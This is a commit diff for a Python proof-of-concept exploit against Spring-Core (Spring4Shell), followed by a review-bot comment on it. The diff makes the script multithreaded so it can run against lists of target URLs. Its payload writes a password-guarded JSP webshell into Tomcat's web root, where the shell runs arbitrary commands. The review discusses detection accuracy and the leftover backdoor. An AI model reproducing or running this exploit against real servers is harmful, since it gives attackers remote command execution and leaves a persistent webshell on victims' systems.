
Commit 994debe

Merge pull request #8 from ruped24/main
2 parents fac608b + a1c810d commit 994debe


2 files changed

+61
-27
lines changed


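--- a/README.md
+++ b/README.md
@@ -67,6 +67,11 @@ Do a global search after "spring-beans-*.jar" and "spring*.jar"
 find . -name spring-beans*.jar
 ```
 
+## Usage:
+```python
+poc.py --help
+```
+
 
 WIP :=)
 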
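--- a/poc.py
+++ b/poc.py
@@ -1,44 +1,73 @@
+#! /usr/bin/env python3
 #coding:utf-8
 
 import requests
 import argparse
+import urllib3
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
 from urllib.parse import urljoin
+from threading import Thread
+from sys import exit
+
+
+class Exploit(Thread):
+
+def __init__(self, url):
+super(self.__class__, self).__init__()
 
-def Exploit(url):
-headers = {"suffix":"%>//",
-"c1":"Runtime",
-"c2":"<%",
-"DNT":"1",
-"Content-Type":"application/x-www-form-urlencoded"
+self.url = url
 
-}
-data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
-try:
+def run(self):
+headers = {
+"suffix": "%>//",
+"c1": "Runtime",
+"c2": "<%",
+"DNT": "1",
+"Content-Type": "application/x-www-form-urlencoded",
+}
 
-requests.post(url,headers=headers,data=data,timeout=15,allow_redirects=False, verify=False)
-shellurl = urljoin(url, 'tomcatwar.jsp')
-shellgo = requests.get(shellurl,timeout=15,allow_redirects=False, verify=False)
-if shellgo.status_code == 200:
-print(f"Vulnerable,shell ip:{shellurl}?pwd=j&cmd=whoami")
-except Exception as e:
-print(e)
-pass
+data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
 
+try:
+requests.post(self.url,
+headers=headers,
+data=data,
+timeout=15,
+allow_redirects=False,
+verify=False)
+shellurl = urljoin(self.url, 'tomcatwar.jsp')
+shellgo = requests.get(shellurl,
+timeout=15,
+allow_redirects=False,
+stream=True,
+verify=False)
+if shellgo.status_code == 200:
+print(f"Vulnerable,shell ip:{shellurl}?pwd=j&cmd=whoami")
+else:
+print(f"\033[91m[" + '\u2718' + "]\033[0m", self.url,
+"\033[91mNot Vulnerable!\033[0m ")
 
+except Exception as e:
+print(e)
+pass
 
 
-def main():
+if __name__ == '__main__':
 parser = argparse.ArgumentParser(description='Spring-Core Rce.')
-parser.add_argument('--file',help='url file',required=False)
-parser.add_argument('--url',help='target url',required=False)
+parser.add_argument('--file', help='url file', required=False)
+parser.add_argument('--url', help='target url', required=False)
 args = parser.parse_args()
+
 if args.url:
-Exploit(args.url)
+Exploit(args.url).start()
+exit()
+
 if args.file:
-with open (args.file) as f:
-for i in f.readlines():
-i = i.strip()
-Exploit(i)
+with open(args.file) as f:
+urls = [i.strip() for i in f.readlines()]
+[Exploit(url).start() for url in urls]
 
-if __name__ == '__main__':
-main()
+else:
+parser.print_help()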
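Review bot: The verdict logic in `run()` (new lines 46–50) is wrong in both directions: a 200 on `tomcatwar.jsp` only shows that something at that path is served — a catch-all handler, or a shell left behind by an earlier run against the same host, also answers 200 — while the new `else` branch prints `Not Vulnerable!` for every other status, so a 403 or 503 from a WAF that blocked the POST is reported as a clean host. I would report anything other than 200 as inconclusive, e.g. `print(f"[?] {self.url} HTTP {shellgo.status_code} - inconclusive")`, and only claim "Vulnerable" when the body no longer contains the literal `<%` (i.e. the JSP was actually interpreted rather than served as text). `stream=True` on that GET is also a leak: the body is never read or closed, so each thread holds its connection open; drop it or use `with requests.get(...) as shellgo:`. Separately, a successful run leaves a persistent webshell at `webapps/ROOT/tomcatwar.jsp` guarded only by the fixed `pwd=j` and no cleanup path — the `--help`/README should say so and describe removing the file after the engagement, or the prefix and password should be randomised per run.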
